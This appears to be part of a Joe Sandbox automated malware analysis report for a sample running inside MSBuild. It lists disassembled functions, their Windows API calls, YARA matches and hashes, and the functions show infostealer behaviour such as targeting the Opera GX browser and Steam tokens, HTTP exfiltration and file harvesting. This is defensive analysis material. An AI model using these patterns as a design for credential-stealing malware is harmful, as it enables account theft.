                                                                                        • Opcode ID: adf510e862ffaae0eac30d3710188e28c4ead385b1d1c5076cab659ba97375c8
                                                                                        • Instruction ID: a7abf6cd44106865342de8c1123d42a84d3c3a1b941403826e444eadc47bdcfc
                                                                                        • Opcode Fuzzy Hash: adf510e862ffaae0eac30d3710188e28c4ead385b1d1c5076cab659ba97375c8
                                                                                        • Instruction Fuzzy Hash: E52184B6A101096BDB14EBB5DC41AEF777DDB40304F44417AF901B32D6EB38DA448AE8
                                                                                        Function 6C563060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C563095
                                                                                          • Part of subcall function 6C5635A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C5EF688,00001000), ref: 6C5635D5
                                                                                          • Part of subcall function 6C5635A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C5635E0
                                                                                          • Part of subcall function 6C5635A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C5635FD
                                                                                          • Part of subcall function 6C5635A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C56363F
                                                                                          • Part of subcall function 6C5635A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C56369F
                                                                                          • Part of subcall function 6C5635A0: __aulldiv.LIBCMT ref: 6C5636E4
                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C56309F
                                                                                          • Part of subcall function 6C585B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C5856EE,?,00000001), ref: 6C585B85
                                                                                          • Part of subcall function 6C585B50: EnterCriticalSection.KERNEL32(6C5EF688,?,?,?,6C5856EE,?,00000001), ref: 6C585B90
                                                                                          • Part of subcall function 6C585B50: LeaveCriticalSection.KERNEL32(6C5EF688,?,?,?,6C5856EE,?,00000001), ref: 6C585BD8
                                                                                          • Part of subcall function 6C585B50: GetTickCount64.KERNEL32 ref: 6C585BE4
                                                                                        • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C5630BE
                                                                                          • Part of subcall function 6C5630F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C563127
                                                                                          • Part of subcall function 6C5630F0: __aulldiv.LIBCMT ref: 6C563140
                                                                                          • Part of subcall function 6C59AB2A: __onexit.LIBCMT ref: 6C59AB30
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2382968484.000000006C561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C560000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2382937491.000000006C560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2383501124.000000006C5DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2383594395.000000006C5EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2383635275.000000006C5F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c560000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                        • String ID:
                                                                                        • API String ID: 4291168024-0
                                                                                        • Opcode ID: a0c090a870a51920468157a54fed5ca8908af067233134dbf59e275ad85b4424
                                                                                        • Instruction ID: 6af683cd2b3b865d7b5aba0b84225e65bb5a36e6504f94e68832e90846dae1ab
                                                                                        • Opcode Fuzzy Hash: a0c090a870a51920468157a54fed5ca8908af067233134dbf59e275ad85b4424
                                                                                        • Instruction Fuzzy Hash: 18F0F932E20744D7CB50DF749C412EA7370AFEF214F521719E88563621FF2066D8838A
                                                                                        Function 00411090 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004110A5
                                                                                        • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004110C0
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004110C7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3183270410-0
                                                                                        • Opcode ID: 0f1bc23e815b81b4786d6a784a5d38f8ed6f0927a21d61c4d8cf93b73736ffa8
                                                                                        • Instruction ID: 1c08e919c02a254b4b37d860c04ab18dc4e81f8fecafc94af7ba70b0d8b08a1d
                                                                                        • Opcode Fuzzy Hash: 0f1bc23e815b81b4786d6a784a5d38f8ed6f0927a21d61c4d8cf93b73736ffa8
                                                                                        • Instruction Fuzzy Hash: 56F06576A016286BDB20AB589C46FDE776CEF04B14F005195FF08A7290DBB46D848BD9
                                                                                        Function 0040D000 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 349COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        • StrCmpCA.SHLWAPI(00000000,Opera GX,004201E9,004201E9,?), ref: 0040D037
                                                                                          • Part of subcall function 00410D50: SHGetFolderPathA.SHELL32(00000000,004201E9,00000000,00000000,?,00000000,?), ref: 00410D81
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00410D10: GetFileAttributesA.KERNEL32(00000000,?,?,0040B844,?,00000000,?,00000000,004201E9,004201E9), ref: 00410D1D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                        • String ID: Opera GX
                                                                                        • API String ID: 1719890681-3280151751
                                                                                        • Opcode ID: f0d4e103f7de1d8a2f0e4d41ef56a32c1f57d9139897f8cc104fe8fe2fb9924c
                                                                                        • Instruction ID: 878ea3d55aa325650e3ef9eb940674a8195e6d8f65bb4788ec79313c0214d067
                                                                                        • Opcode Fuzzy Hash: f0d4e103f7de1d8a2f0e4d41ef56a32c1f57d9139897f8cc104fe8fe2fb9924c
                                                                                        • Instruction Fuzzy Hash: 2AD11F72910108ABCB14FBA1D952DEE7778AF54304F50813EF806765D2EB38AA0CCAA5
                                                                                        Function 00412EE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00405010: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405062
                                                                                          • Part of subcall function 00405010: StrCmpCA.SHLWAPI(?,0169A3B0,?,?,?,?,?,?,?), ref: 0040507A
                                                                                          • Part of subcall function 00405010: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004050A2
                                                                                          • Part of subcall function 00405010: HttpOpenRequestA.WININET(00000000,GET,?,0169B128,00000000,00000000,-00400100,00000000), ref: 004050DC
                                                                                          • Part of subcall function 00405010: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405100
                                                                                          • Part of subcall function 00405010: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040510F
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,?,00413AD4), ref: 00412F20
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                                                        • String ID: ERROR
                                                                                        • API String ID: 3287882509-2861137601
                                                                                        • Opcode ID: 1da8bc6414bce258d99fbbd954122203d13867493c65cab720fdee4583fc42c6
                                                                                        • Instruction ID: b53bf029f71d461a7cd9a980bfe8ed76a20664019d00161f83185fc2695e4cb7
                                                                                        • Opcode Fuzzy Hash: 1da8bc6414bce258d99fbbd954122203d13867493c65cab720fdee4583fc42c6
                                                                                        • Instruction Fuzzy Hash: 3211303261010867CB24FF72E8529DD3768AE10708F40817EF805779D2EF386A0DCAD9
                                                                                        Function 004103E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentHwProfileA.ADVAPI32(00000000), ref: 004103EB
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CurrentProfilelstrcpy
                                                                                        • String ID: Unknown
                                                                                        • API String ID: 2831436455-1654365787
                                                                                        • Opcode ID: 81eb31e86bdc8a35bbabfedbb1a12354566373b59c161d2c4219fdc220175391
                                                                                        • Instruction ID: 19cb3bbfcee307e431a48a4cc2986d0f4610495d139a97f2bc99e78c6af915a2
                                                                                        • Opcode Fuzzy Hash: 81eb31e86bdc8a35bbabfedbb1a12354566373b59c161d2c4219fdc220175391
                                                                                        • Instruction Fuzzy Hash: B8E08033F04128534A207BA87C018DE776CDB44755710427FFD05D7241DB69995547D9
                                                                                        Function 004161A0 Relevance: 3.1, APIs: 2, Instructions: 124stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00410D50: SHGetFolderPathA.SHELL32(00000000,004201E9,00000000,00000000,?,00000000,?), ref: 00410D81
                                                                                        • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004161D7
                                                                                        • lstrcatA.KERNEL32(?,01699C28), ref: 004161F2
                                                                                          • Part of subcall function 00415EA0: wsprintfA.USER32 ref: 00415EBC
                                                                                          • Part of subcall function 00415EA0: FindFirstFileA.KERNEL32(?,?), ref: 00415ED3
                                                                                          • Part of subcall function 00415EA0: StrCmpCA.SHLWAPI(?,004201DC), ref: 00415EFC
                                                                                          • Part of subcall function 00415EA0: StrCmpCA.SHLWAPI(?,004201D8), ref: 00415F16
                                                                                          • Part of subcall function 00415EA0: wsprintfA.USER32 ref: 00415F3B
                                                                                          • Part of subcall function 00415EA0: StrCmpCA.SHLWAPI(?,004201E9), ref: 00415F4A
                                                                                          • Part of subcall function 00415EA0: wsprintfA.USER32 ref: 00415F67
                                                                                          • Part of subcall function 00415EA0: PathMatchSpecA.SHLWAPI(?,?), ref: 00415F97
                                                                                          • Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,0169A440,?,000003E8), ref: 00415FC3
                                                                                          • Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,004201E0), ref: 00415FD5
                                                                                          • Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,?), ref: 00415FE3
                                                                                          • Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,004201E0), ref: 00415FF5
                                                                                          • Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,?), ref: 00416009
                                                                                          • Part of subcall function 00415EA0: wsprintfA.USER32 ref: 00415F86
                                                                                          • Part of subcall function 00415EA0: CopyFileA.KERNEL32(?,00000000,00000001), ref: 004160AA
                                                                                          • Part of subcall function 00415EA0: DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004201E9), ref: 00416119
                                                                                          • Part of subcall function 00415EA0: FindNextFileA.KERNEL32(?,?), ref: 00416160
                                                                                          • Part of subcall function 00415EA0: FindClose.KERNEL32(?), ref: 00416172
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                        • String ID:
                                                                                        • API String ID: 2104210347-0
                                                                                        • Opcode ID: 0e7f95d3395cea5f87a6574ef32e59f04aa0c2cb2f766a02bd6c4fbc95eef465
                                                                                        • Instruction ID: 98d42b3406129106ca52e3ce68672895595a1a21ef3683531b9833437f7f45f5
                                                                                        • Opcode Fuzzy Hash: 0e7f95d3395cea5f87a6574ef32e59f04aa0c2cb2f766a02bd6c4fbc95eef465
                                                                                        • Instruction Fuzzy Hash: 4B41C375E002086BCB24FBB1DC43DFE377AABC4304F44451EF90562191EAB85B88CBA6
                                                                                        Function 00414400 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 53stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,?,00000000,004201E9,?,?,?,00416ED8,?,?), ref: 0041443F
                                                                                          • Part of subcall function 004142A0: Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
                                                                                          • Part of subcall function 004142A0: CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
                                                                                          • Part of subcall function 004142A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399
                                                                                        Strings
                                                                                        • Soft\Steam\steam_tokens.txt, xrefs: 00414454
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpy$lstrlen$CreateObjectSingleSleepThreadWaitlstrcat
                                                                                        • String ID: Soft\Steam\steam_tokens.txt
                                                                                        • API String ID: 2356188485-3507145866
                                                                                        • Opcode ID: 834c8e9a1660923ca4824822d867a6475a7f0fbc8207dcd100cbfa916f559b4c
                                                                                        • Instruction ID: 081c47b6d937ec40d6c996030d6839391ee10078badbf5345814b8fee0ffd502
                                                                                        • Opcode Fuzzy Hash: 834c8e9a1660923ca4824822d867a6475a7f0fbc8207dcd100cbfa916f559b4c
                                                                                        • Instruction Fuzzy Hash: 9A11D6739141086ADB14FBB2DC539EE773CAE50348F50857EB506728D2EF38664CC6A9
                                                                                        Function 00407AB0 Relevance: 2.7, APIs: 2, Instructions: 214stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00407C9D
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00407CB1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpy$lstrlen$lstrcat
                                                                                        • String ID:
                                                                                        • API String ID: 2500673778-0
                                                                                        • Opcode ID: 79410e4df787b84ead98e4c408f0a717c03b23574040209dbabfa651d6aa55d0
                                                                                        • Instruction ID: a859a10bf49f6e2adb18c49c1629115e66b52ddef5719b77f7765414daa87ac6
                                                                                        • Opcode Fuzzy Hash: 79410e4df787b84ead98e4c408f0a717c03b23574040209dbabfa651d6aa55d0
                                                                                        • Instruction Fuzzy Hash: E3711C72910108ABCB28FBA1DC56DEE7379AF54304B50853EF502765D1EF386A0DCB69
                                                                                        Function 004063D0 Relevance: 2.6, APIs: 2, Instructions: 71memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,00000000,?,?,?,0040688E,00000000), ref: 0040642F
                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,?,0040688E,00000000), ref: 00406463
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
